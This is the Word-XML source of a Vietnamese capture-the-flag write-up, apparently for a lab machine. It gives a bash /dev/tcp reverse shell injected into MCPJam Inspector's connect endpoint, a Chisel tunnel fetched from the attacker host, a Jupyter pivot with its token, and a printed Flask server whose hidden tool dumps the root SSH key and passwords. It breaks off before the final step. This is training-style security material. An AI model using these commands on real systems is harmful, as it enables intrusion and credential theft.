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9F09D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1. Recon </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400A52B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Bắt đầu bằng scan nmap để xác định các cổng đang mở:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5F7E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6"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A5BB2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nmap -p- --min-rate </w:t>
      </w:r>
      <w:r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5000</w:t>
      </w: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10.129</w:t>
      </w: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.245.216</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A68C59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Kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB3B1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22/tcp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– SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F23430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80/tcp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– HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FB00E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6274/tcp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– unknown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F64ACD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Cổng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6274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không phải dịch vụ web thông thường, đây là dấu hiệu đầu tiên cần khảo sát kỹ — sau này xác định đây chính là </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9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MCPJam Inspector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, một công cụ debug cho MCP (Model Context Protocol) server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724311B9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040" cy="12947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8070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2. Khảo sát MCPJam Inspector </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C29E6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Truy cập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http://10.129.245.216:6274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bằng trình duyệt, phát hiện đây là giao diện </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9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MCPJam Inspector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— công cụ dùng để test/kết nối tới các MCP server (giao thức MCP dùng cho AI agent gọi tool).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0021F18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Dùng Burp Suite Repeater để bắt và chỉnh sửa request tới endpoint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/api/mcp/connect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DC3453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6AEC7096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1610" cy="2394585"/>
            <wp:effectExtent l="0" t="0" r="11430" b="133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D310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Điểm mấu chốt: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endpoint này nhận trực tiếp field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"command"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và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"args"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rồi truyền cho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child_process.spawn()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phía server — nghĩa là </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9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không có validate/whitelist lệnh nào cả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. Đây là lỗ hổng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9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Remote Code Execution (RCE)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không cần xác thực (unauthenticated), vì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serverConfig.command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bị người dùng kiểm soát hoàn toàn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA658B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Sửa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args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thành reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8D152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"args":</w:t>
      </w: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["-c",</w:t>
      </w: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"bash -i &gt;&amp; /dev/tcp/10.10.15.51/4444 0&gt;&amp;1"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A7835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Mở listener trước khi gửi request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A30093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nc</w:t>
      </w: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-lvnp </w:t>
      </w:r>
      <w:r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4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774BEBA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Gửi request → nhận được shell với user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mcp-dev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, working directory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/opt/mcpjam/node_modules/@mcpjam/inspector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— xác nhận chính xác service bị khai thác là MCPJam Inspector.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A4A452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1610" cy="2402840"/>
            <wp:effectExtent l="0" t="0" r="11430" b="508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1B60D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="200" w:leftChars="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSu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Liệt kê tiến trình </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9711C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Từ shell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mcp-dev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, chạy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ps aux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để xem các service khác đang chạy trên máy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ED91C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ps</w:t>
      </w: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aux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FE338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Kết quả đáng chú ý:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC29AF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analyst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đang chạy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9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Jupyter Lab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, bind ở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127.0.0.1:8888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, kèm theo token trong dòng lệnh (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--ServerApp.token=...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) — đây là điểm có thể pivot vì Jupyter cho phép thực thi code trực tiếp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DD269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root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chạy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/opt/opsmcp/server.py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— một </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9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service Flask nội bộ tên "opsmcp"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, đây chính là mục tiêu khai thác tiếp theo để leo quyền root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CEA287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22E05582">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numP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1610" cy="499110"/>
            <wp:effectExtent l="0" t="0" r="11430" b="381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3C49151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4. Pivot vào Jupyter qua Chisel tunnel </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3737082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Vì Jupyter chỉ bind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127.0.0.1:8888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trên máy target (không truy cập trực tiếp từ ngoài được), cần dựng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9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tunnel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để forward cổng đó ra máy tấn công. Dùng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9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Chisel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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7325365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Trên Kali (máy tấn công) — chạy Chisel server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573D8A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6"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D732E5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wget</w:t>
      </w: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https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz -O chisel.gzgunzip chisel.gz </w:t>
      </w:r>
      <w:r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&amp;&amp;</w:t>
      </w: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chmod</w:t>
      </w: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+x chisel./chisel server -p </w:t>
      </w:r>
      <w:r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9002</w:t>
      </w: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--reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D7E27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--reverse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cho phép client (target) chủ động kết nối ngược về, phù hợp khi target không có port nào expose ra ngoài để mình connect vào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25421EC5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040" cy="1849755"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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99D1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Host binary Chisel qua HTTP server đơn giản để tải xuống trên target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A3DDE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python3 -m http.server </w:t>
      </w:r>
      <w:r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8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAB2E8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5F44F052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709160" cy="1013460"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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891B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Trên target (qua reverse shell mcp-dev) — tải Chisel client và tạo tunnel:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C0E8B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wget</w:t>
      </w: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http://10.10.15.51:8000/chisel -O chisel</w:t>
      </w:r>
      <w:r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chmod</w:t>
      </w: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+x chisel./chisel client </w:t>
      </w:r>
      <w:r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10.10</w:t>
      </w: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.15.51:9002 R:8888:127.0.0.1:8888 </w:t>
      </w:r>
      <w:r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&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CCE6C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71D30ADE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865" cy="2343785"/>
            <wp:effectExtent l="0" t="0" r="3175" b="317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A44C6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Truy cập Jupyter và lấy user flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246F93F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HYPERLINK "http://127.0.0.1:8888/lab?token=a7f3b2c9d8e1f4a5b6c7d8e9f0a1b2c3d4e5f6a7" </w:instrTex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http://127.0.0.1:8888/lab?token=a7f3b2c9d8e1f4a5b6c7d8e9f0a1b2c3d4e5f6a7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5AF6848C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6EFBAA7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Mở terminal trong JupyterLab (chạy với quyền user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analyst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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6736571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Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129C4AF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cat</w:t>
      </w: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user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5782F50F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2FC9997E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3950335"/>
            <wp:effectExtent l="0" t="0" r="635" b="1206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DD513">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="200" w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSu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Đọc source code OPSMCP để tìm lỗ hổng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A2000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Từ terminal Jupyter (quyền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analyst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), đọc file service mà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root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đang chạy (thấy ở bước 3):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67027BF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cat</w:t>
      </w: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/opt/opsmcp/server.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76282E6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Phân tích source code phát hiện các điểm quan trọng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790C92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API Key hardcode trong source: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VALID_API_KEY = "opsmcp_secret_key_4f5a6b7c8d9e0f1a"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— dùng để auth vào endpoint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/tools/call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 w14:paraId="340C243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VISIBLE_TOOLS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: các tool công khai, an toàn (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system_status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list_services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check_disk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view_logs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) — trả về qua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/tools/list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 w14:paraId="5386F2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HIDDEN_TOOLS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: gồm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ops._admin_dump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và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ops._debug_mode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— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9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không xuất hiện trong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/tools/list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nhưng code vẫn gộp vào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ALL_TOOLS = {**VISIBLE_TOOLS, **HIDDEN_TOOLS}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và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9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vẫn chấp nhận gọi qua </w:t>
      </w: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/tools/call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nếu biết đúng tên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBFDAA9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45758CF7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040" cy="4550410"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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5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CF673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6D9CA212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Dump key qua ops._admin_dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB8CE84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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CFB68B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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BCDD79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OPSMCP - Operations MCP Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD7C12A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Internal tool for system operations management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F28E18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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0482FB4D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</w:p>
    <w:p w14:paraId="45A0DA84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from flask import Flask, jsonify, request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBE4C07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import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F574053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</w:p>
    <w:p w14:paraId="7A76EFE2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app = Flask(__name__)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67024065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</w:p>
    <w:p w14:paraId="661C18C4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# API Key for authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE86F8F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VALID_API_KEY = "opsmcp_secret_key_4f5a6b7c8d9e0f1a"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D20764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</w:p>
    <w:p w14:paraId="4BB96DEE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# Registered tools (visible)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C47CE44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VISIBLE_TOOLS = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2E0B8F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"ops.system_status": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354CFF7A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"description": "Get system status and health metrics",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB515DB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"parameters": {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1438B8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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1A7B5A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"ops.list_services": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37102C61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"description": "List running services",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCA6E94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"parameters": {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BC5781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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7294B824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"ops.check_disk": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485A3579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"description": "Check disk usage",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B613B31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"parameters": {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5479E033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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B3B448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"ops.view_logs": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745606E2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"description": "View recent system logs",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1094241F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"parameters": {"service": "string"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D55022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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFB53C0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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FB0698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</w:p>
    <w:p w14:paraId="5161E81E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# Hidden tools (not in /tools/list but callable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B652789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HIDDEN_TOOLS = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73151B56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"ops._admin_dump": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4DFE84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"description": "Emergency credential dump - INTERNAL ONLY",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D42265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"parameters": {"target": "string", "confirm": "boolean"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DC5437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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFFA306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"ops._debug_mode": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6955C63C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"description": "Enable debug mode",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40933049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"parameters": {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C26338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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F88337A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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C202DF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</w:p>
    <w:p w14:paraId="48364252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ALL_TOOLS = {**VISIBLE_TOOLS, **HIDDEN_TOOLS}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BACB07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</w:p>
    <w:p w14:paraId="389E7274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def check_auth():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452D8355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"""Check API key authentication"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16443103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api_key = request.headers.get('X-API-Key', '')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E83A549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return api_key == VALID_API_KEY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE7EAD9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</w:p>
    <w:p w14:paraId="7CFABDC4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@app.route('/')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5018554B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def index():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A77CB6C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return jsonify({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263408E4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"server": "OPSMCP",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7CF415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"version": "2.1.0",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4487E294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"status": "operational",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763264F9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"endpoints": ["/tools/list", "/tools/call", "/health"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A00A79E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"auth": "Required - X-API-Key header"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149A3B9C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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296E7724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</w:p>
    <w:p w14:paraId="0BB79F97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@app.route('/health')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B59E1BD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def health():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D71DD8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return jsonify({"status": "healthy", "uptime": "14d 3h 22m"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC91177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</w:p>
    <w:p w14:paraId="10C2FD57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@app.route('/tools/list')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E771762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def list_tools():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F62ED9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if not check_auth():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DE7CCF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return jsonify({"error": "Unauthorized", "message": "Valid X-API-Key header required"}), 401</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED63C68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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752EEA43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return jsonify({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185888AC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"tools": list(VISIBLE_TOOLS.keys()),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AE2757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"count": len(VISIBLE_TOOLS),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F769AFD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"details": VISIBLE_TOOLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193A8D57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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBC7F86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</w:p>
    <w:p w14:paraId="03B25215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@app.route('/tools/call', methods=['POST'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262C1156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def call_tool():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC98FC0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if not check_auth():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDDDD19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return jsonify({"error": "Unauthorized", "message": "Valid X-API-Key header required"}), 401</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D582AFA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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13873961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data = request.get_json() or {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A495F66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tool_name = data.get('name', '')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B12855C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args = data.get('arguments', {})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4068846E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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5542D32E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if not tool_name:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37663FE2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return jsonify({"error": "Tool name required"}), 400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DB3EE6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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430C970D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if tool_name not in ALL_TOOLS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B447EF4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return jsonify({"error": f"Unknown tool: {tool_name}"}), 404</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1247D4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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6276EB29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# Execute tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E06C533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if tool_name == "ops.system_status":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB5C8F4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return jsonify({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F98E37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"cpu": "23%",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD181F2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"memory": "1.2GB/4GB",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65085380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"load": "0.45",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632F3A8D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"status": "nominal"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1491BF96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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661086F8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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FFB620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elif tool_name == "ops.list_services":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F3E330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return jsonify({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031D588B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"services": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A469F20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{"name": "nginx", "status": "running", "pid": 1234},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E25120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{"name": "opsmcp", "status": "running", "pid": 5678},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28804DFF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{"name": "jupyter", "status": "running", "pid": 9012},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D77EAA2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{"name": "mcpjam", "status": "running", "pid": 3456}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B4851E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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3BD4C9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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAE9EC5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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550B5963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elif tool_name == "ops.check_disk":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB34FFC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return jsonify({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F2D6C7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"filesystems": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357E1F3A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{"mount": "/", "used": "4.2G", "available": "15G", "percent": "22%"},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBEEA58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{"mount": "/home", "used": "1.1G", "available": "8G", "percent": "12%"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7163B54E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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C95903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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E51F97D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B9756A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elif tool_name == "ops.view_logs":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8A76EE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service = args.get('service', 'system')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C50325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return jsonify({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2629C165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"service": service,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1AE4CD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"logs": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7B0DAE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"[2026-01-22 10:00:01] Service started",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10266D97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"[2026-01-22 10:00:02] Listening on configured port",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6360C9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"[2026-01-22 10:15:33] Health check passed",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17266BAE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"[2026-01-22 11:00:00] Routine maintenance completed"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BC42A2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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA47919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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2271BA5A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEA6AE8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elif tool_name == "ops._debug_mode":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1888F64D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return jsonify({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312B27EC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"debug": True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024E6B8A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"message": "Debug mode enabled",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B39FBE0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"hidden_tools": list(HIDDEN_TOOLS.keys()),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06280F0A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"note": "Debug endpoints now accessible"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25341718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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C18EB2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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F34872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elif tool_name == "ops._admin_dump":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4190A251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target = args.get('target', '')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F4FDFD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confirm = args.get('confirm', False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5162E279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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07915394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if not confirm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D63AB60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return jsonify({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5014BDCD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"error": "Confirmation required",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBF36C1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"usage": "Set confirm=true to proceed",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56711FD0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"warning": "This dumps sensitive credentials"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1497BB50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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7164F403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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C62929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if target == "ssh_keys":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EB5FFB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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C58F99B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with open('/root/.ssh/id_rsa', 'r') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42607907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    key_data = f.read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ADF69A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return jsonify({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5389D0D0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    "target": "ssh_keys",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEA58B0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    "root_private_key": key_data,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0882023D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    "note": "Emergency recovery key dump"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43399089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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D29E47E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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A4D4C2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return jsonify({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6C5A64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    "target": "ssh_keys",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F7853F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    "error": f"Could not read key: {str(e)}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264E9013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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7A00A0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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B43917D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elif target == "passwords":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E69B1B4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return jsonify({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4F67F3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"target": "passwords",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310735BB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"dump": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0360687C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    "root": "$6$rounds=656000$saltsalt$hashedpassword",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAE4709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    "analyst": "JupyterN0tebook!2026",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B3FBFA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    "mcp-dev": "Mcp!Insp3ct0r2026"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FC92E3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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FFAC02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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC1A4DE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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE1DC8F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elif target == "tokens":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E976FD3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return jsonify({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47402986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"target": "tokens",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC8AFEC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"api_tokens": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9D9D00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    "admin_token": "opsmcp_admin_7f3b9c2d1e4f5a6b",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F52E3E1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    "service_token": "opsmcp_svc_8c9d0e1f2a3b4c5d"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C0BF63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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A08F45D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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E27114D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8C8507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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780042F1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return jsonify({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EE61ED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"error": "Invalid target",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DFB595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    "valid_targets": ["ssh_keys", "passwords", "tokens"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F101452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        })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A21FDB3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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033DD3E8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   return jsonify({"error": "Tool execution failed"}), 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1132EF0D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</w:p>
    <w:p w14:paraId="40428102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if __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE296A4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app.run(host='127.0.0.1', port=5000, debug=False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC5EBAB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</w:p>
    <w:p w14:paraId="7A6B25B9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4532B6CF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74504D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="200" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSu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Khai thác hidden tool để lấy SSH key của root </w:t>
      </w:r>
    </w:p>
